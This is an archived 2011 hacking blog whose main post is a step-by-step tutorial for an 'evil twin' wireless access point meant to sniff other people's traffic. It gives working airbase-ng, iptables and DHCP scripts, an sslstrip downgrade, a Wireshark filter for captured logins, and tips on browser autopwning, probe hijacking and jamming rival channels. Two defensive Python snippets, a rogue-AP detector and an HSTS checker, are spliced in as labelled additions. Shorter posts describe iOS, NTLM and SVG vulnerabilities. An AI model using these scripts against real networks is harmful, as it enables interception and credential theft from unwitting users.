Monday, October 10, 2011

Passive Wireless Sniffing Attack

So first off, sorry for the downtime; I've been moving around a lot and trying a lot of things. I really like doing this, so I thought bringing a quality tutorial to the blog might help a little.

The purpose of this tutorial is to teach you how to make a wireless access point solely for the purpose of sniffing. It's great for networks where you can't perform ARP spoofing and wireless is in the mix. There are a lot of possibilities for this attack, but I am only going to cover the basics.

First though, props to qnix over at 0x80, he wrote the blog post that helped inspire this one.

Let's get started >:D

So we begin with a simple plan: create a wireless access point that bridges our ethernet port with our wireless card. (Just for your sanity: I have tried doing wlan -> wlan bridging and it ended up with A LOT of headaches, from the AP suddenly having a hidden SSID, a setting I had turned off, to DNS issues, so I felt it best to go through eth0.) We need to do a couple of basic things:
  • Create a soft AP
  • Assign IP addresses
  • Sniff the traffic
  • Filter out things that may hinder our sniffing (SSL)
  • Bridge the two adapters
  • Put it all into script form so we can access it whenever
We've got some work to do as most of these are easier said than done.

THE TOOLS:
  • Software
    • The aircrack-ng suite
    • sslstrip
    • dhcp3d
  • Hardware
    • Computer (No fucking duh)
    • Wireless card (Preferably the extremely sexy Alfa AWUS036H)
  • Knowledge
    • DHCP 
    • DNS
    • Linux network interfaces
OK now let's actually get started.

Airbase-ng:
First, we need to start airbase-ng. We turn our cards to monitor mode,
airmon-ng start [if]
Then we just start airbase-ng
airbase-ng -e "[name of network]" -c [channel] [if (Most likely mon0)]
Now we are off to the painful part.

Scripting it up:
setup.sh [if] [gateway] (If you have to edit evil.conf, edit this too.)
#! /bin/bash
ifconfig at0 up
ifconfig $1 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
destroy.sh [if]
#! /bin/bash
ifconfig at0 down
ifconfig $1 down
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward

killall -9 dhcpd3

ifconfig $1 up

ifdown $1
ifup $1
evil.conf (You will probably need to edit this)
option domain-name-servers 192.168.1.1;
default-lease-time 600;
max-lease-time 720;

ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}

Hefty. Let's explain what's going on here.

So first up we have setup.sh. This does a whole host of things, mainly setting up the DHCP stuff; let's chug through it piece by piece.

The first part,
ifconfig at0 up
ifconfig $1 up
turns on at0, the sniffing interface that airbase-ng creates, and then ensures that the interface that is going to be bridged is up.

Let's get more gory.
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2
Happy, right? This sets up most of the IP routing tables and the other painful stuff. This might need more tweaking if you have a different network setup, but it should work for most people. I'm not going to get too far into this as it's pretty self-explanatory for anyone who has had to deal with iptables before.

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up
This section is commented out, but I left it there for a specific purpose. It is supposed to be easier to use brctl (Bridge Control) to bridge the adapters, but it acts weird and I couldn't get DNS updates. I'll give a nickel to anyone who can make this work :3.

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
This sets up our DHCP server. Basically, it just copies our evil.conf file into the dhcp3 folder, does some directory making and owning, and then starts DHCP on at0 using that conf file.

Next we have destroy.sh, which just reverts the changes and removes the bridge. It also kills DHCP.

Lastly we may need to edit the evil.conf file. The only lines you should need to edit are the top one,
option domain-name-servers 192.168.1.1;
and this section
subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}
Usually you will just edit the subnets (e.g. changing the subnet from 192.168.3.0 to 192.168.6.0). However, if you do, be sure to change the corresponding values in setup.sh.
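From the other side of the table: a soft AP built like this shows up in any wireless scan as one of your own ESSIDs being beaconed from a BSSID that is not in your inventory, typically as an open network. The following detector is an added example, not code from the original post; the inventory, ESSID names and scan records are constructed samples.

```python
"""Flag soft APs impersonating a managed network from wireless scan output.

Added example, not part of the original post. The inventory and the
scan records below are constructed; replace them with your own."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanRecord:
    bssid: str     # AP MAC address as seen in the scan
    essid: str     # network name being beaconed
    channel: int
    privacy: str   # "OPN", "WEP", "WPA", "WPA2", ...


# Hypothetical site inventory: ESSID -> expected privacy and authorised BSSIDs
INVENTORY = {
    "CorpWifi": {"privacy": "WPA2",
                 "bssids": {"00:11:22:33:44:55", "00:11:22:33:44:56"}},
}


def find_rogue_aps(records, inventory=INVENTORY):
    """Return a list of (reason, record) for APs that need investigation."""
    findings = []
    for rec in records:
        site = inventory.get(rec.essid)
        if site is None:
            continue                              # not one of our ESSIDs
        if rec.bssid.lower() in site["bssids"]:
            continue                              # known, authorised AP
        reason = "managed ESSID beaconed from unknown BSSID"
        if rec.privacy != site["privacy"]:
            reason += f"; privacy {rec.privacy} differs from {site['privacy']}"
        findings.append((reason, rec))
    return findings


# Constructed scan: one real AP, one evil twin on channel 4, one neighbour
SAMPLE_SCAN = [
    ScanRecord("00:11:22:33:44:55", "CorpWifi", 6, "WPA2"),
    ScanRecord("00:c0:ca:aa:bb:cc", "CorpWifi", 4, "OPN"),
    ScanRecord("de:ad:be:ef:00:01", "Neighbours", 11, "WPA2"),
]

if __name__ == "__main__":
    for reason, rec in find_rogue_aps(SAMPLE_SCAN):
        print(f"{rec.bssid} ch{rec.channel} {rec.essid!r}: {reason}")
```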

Putting It All Together:
Next we just run the scripts. Make sure that airbase-ng is up so that at0 is present, or else this will just error out.

Just run:
./setup.sh [if] [gateway]
This keeps dhcpd in verbose mode and lets you know when new people connect. You may want to run sslstrip next. This strips SSL elements out of a page so it forces an unencrypted connection.
./sslstrip.py -k -a -f
Lastly just run wireshark on at0, with this display filter:
http.request.method == POST || http.request.method == GET || http.request.uri contains login || pop.request.command || imap.response == 1 || ftp.request.command
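The downgrade sslstrip performs only works because the client's first request goes out as plain HTTP; a browser that has cached an HSTS policy for the host will refuse to do that. The checker below is an added example, not code from the original post or from sslstrip; the header values are constructed and MIN_AGE is a hypothetical policy threshold.

```python
"""Judge whether an HTTPS response carries an HSTS policy strong enough to
stop an sslstrip-style downgrade on return visits.

Added example, not part of the original post. Header values are
constructed samples; MIN_AGE is an assumed policy threshold."""
import re

MIN_AGE = 15552000   # 180 days, a commonly used minimum (assumption)


def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797 syntax).
    Returns None when max-age is missing or malformed: browsers then
    ignore the header entirely."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name, arg = name.strip().lower(), arg.strip().strip('"')
        if name == "max-age":
            if not re.fullmatch(r"\d+", arg):
                return None
            policy["max_age"] = int(arg)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def hsts_verdict(headers, min_age=MIN_AGE):
    """Return (protected, reason) for a dict of HTTPS response headers."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return False, "no HSTS header: every plain-HTTP request is downgradable"
    policy = parse_hsts(value)
    if policy is None:
        return False, "malformed HSTS header: browsers ignore it"
    if policy["max_age"] == 0:
        return False, "max-age=0 deletes any cached policy"
    if policy["max_age"] < min_age:
        return False, f"max-age {policy['max_age']} is below the {min_age}s minimum"
    if not policy["include_subdomains"]:
        return True, "host protected after first HTTPS visit; subdomains are not"
    return True, "host and subdomains protected after first HTTPS visit"
```

A policy only takes effect after one clean HTTPS visit, so the very first connection made through a rogue AP is still exposed unless the host is on the browser preload list.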
There are a couple extra things you can do after this.

For starters, you can do what is suggested in the article on 0x80 and run an exploit server autopwning any browser that connects. However, the drawback to this is that Windows will notify the user of a limited connection, and that might make people switch networks as they can't access the internet.

The other one I thought of was to use:
airbase-ng -P mon0
This responds to all probes even if they specify an ESSID, which lets you hijack others' networks as long as you have better signal strength. However, the drawback is that most people WILL have a better connection strength with their original router.

The best one I could think of was to use wifijammer to block all signals on all channels except yours (use an unused channel like 4 or whatever). This will make people want to connect to you as everyone else's connection doesn't work. There are still drawbacks, like whether they will actually know HOW to connect to a new wifi network. Some people are just that special.

Either way, I hope this helps. A good section was taken from 0x80; most of the credit goes to him and the community.

Monday, May 30, 2011

Free Hacking Note Book!

Hey all,
So I started re-writing a resource I have been building for the past year that I call the Hacker's Note Book. Essentially it is a huge document filled with pretty much all the knowledge I have on the subject of hacking. I will release it in a couple of weeks and plan to write a couple of tutorials on the way. I have recently been thinking about writing a tutorial on brute-forcing passwords as I keep getting requests for one. I am deciding whether I should write about ncrack or medusa.

Tuesday, March 1, 2011

No iPhone is Safe. Surge of Exploits Raises Questions.

I'm no fan of Apple. Their proprietary bullshit and overpriced, last-gen hardware irks me, to say the least. However, as a penetration tester, the common Apple lie always gets me: "Apple products can't get viruses". Don't make me fucking laugh. The truth is that Macs are just as vulnerable to exploits as any other OS; any penetration tester knows this simple truth. However, you can still hear the same old rhetoric from an Apple fanboy, that Apple products are simply invulnerable to attacks. The only reason Macs haven't been targeted like Windows and Linux is simply market share. If Macs were to gain a larger market share they would get ruined by the amount of new exploits and viruses. Nothing has been more proof of that than iOS, which has gained a considerable amount of market share in the mobile OS division. iOS runs OSX in the backend and (here's the kicker) exploit-db now has 13 exploits, all released in around 3 days, that detail many exploits for iOS systems. Luckily, they are not OS exploits but program exploits.

Why is iOS so exploitable? We can simply look at how Apple is run for that. Apple not only locks down their firmware but releases updates on their horrid update schedule. A bad update schedule equals better exploitability. Next, most people have absolutely no control over the actual security of the device unless they have jailbroken it. If you can't turn off insecure services on the device, you aren't secure. I hate that Apple treats their customers like babies and, in turn, treats their customers' data in an insecure fashion. Lastly, the developers for the platform tend to write insecure code. Developers usually are start-up companies who have little to no security training and, therefore, will write bad code.

I can only hope that most of this gets resolved quickly, but that is up to the discretion of the app developers. Now that iOS is popular, it is possible that we will see a wave of new default service exploits and not just app exploits. At least it will give us all some sort of stability on the whole thing as it will force Apple to actually patch their software.

Sunday, February 6, 2011

Mulling Through the Windows NTLM Weak Nonce Vulnerability

As of late there have been relatively few Windows 7 exploits; the only major ones were a DoS attack using SMB and a UAC code-injection bypass attack. However, a new exploit surfaced about a month ago detailing an exploit capable of bypassing SMB user credentials by using repeated challenges. The whole thing (documented here) works similarly to the infamous SMB credential reflection attack. It involves repeatedly spamming a computer with SMB Negotiate Protocol Requests and logging the challenges that result. Then the computer is forced to connect to a JavaScript page that repeatedly connects back to the attacker. The attacker listens for similar challenges and, when it receives a challenge that it knows, it replays the challenge. The sad part is that, similar to the aforementioned SMB credential reflection attack, the exploit has been around for a pretty long time: 17 years. The exploit was released on the Microsoft site sometime last year and the exploit PoC was posted about a month ago.

MS10-081 SVG Issues! (YAY)

So back at the beginning of the year a new exploit appeared on exploit-db.com concerning SVG graphics. The whole issue had to do with a third-party plugin, yet another Adobe plug-in; this time it was Adobe SVG Viewer. (Last September it was Flash and PDF exploits.) Apparently the patch has already gone out and, in fact, was the very thing that made finding the exploit possible. (You can read more about the beauty of this hack here.) Now, this hack only works for Windows XP SP3 (or so I am told) and has already been patched (so it looks like most are safe for now).

Welcome to FOPTA!

Hi,
My name is Ian Rash and I run an online penetration testing academy on YouTube. I have been studying computers since I was in the fifth grade. I began programming in BASIC and eventually went on to take classes at Irvine Valley College, in middle school, for A+ and Network+. I passed both classes. I began studying security when I was in high school about 2 years ago. I came to love the world of pen testing and now I run a course online dedicated to the subject. I hope to do some text tutorials on the blog, so stay tuned for extra lessons. :)